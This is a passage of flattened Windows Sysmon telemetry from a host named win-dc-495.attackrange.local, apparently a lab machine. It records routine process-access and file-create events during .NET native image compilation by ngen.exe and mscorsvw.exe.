0319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.538{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-5304-00000000A301}2828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.523{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-5304-00000000A301}2828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.523{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-5304-00000000A301}2828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:07.476{59A5CD1D-924B-6005-5204-00000000A301}2352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\930-0\System.Numerics.dll2021-01-18 13:51:07.476 10341000x80000000000000008600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.335{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-5204-00000000A301}2352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.320{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-5204-00000000A301}2352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.320{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-5204-00000000A301}2352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.288{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-5104-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.273{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-5104-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.273{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-5104-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:07.226{59A5CD1D-924B-6005-5004-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ca0-0\System.Net.Http.WebRequest.dll2021-01-18 13:51:07.226 10341000x80000000000000008593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.179{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-5004-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.163{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-5004-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.163{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-5004-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.132{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-4F04-00000000A301}3004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.117{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-4F04-00000000A301}3004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.117{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-4F04-00000000A301}3004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:07.038{59A5CD1D-924A-6005-4E04-00000000A301}4636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\121c-0\System.Net.dll2021-01-18 13:51:07.038 10341000x80000000000000008628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.882{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5A04-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.867{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5A04-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.867{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5A04-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.804{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5904-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.788{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-924C-6005-5904-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.788{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924C-6005-5904-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:08.726{59A5CD1D-924C-6005-5804-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b38-0\System.Runtime.Caching.dll2021-01-18 13:51:08.726 10341000x80000000000000008621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:08.585{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924C-6005-5804-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 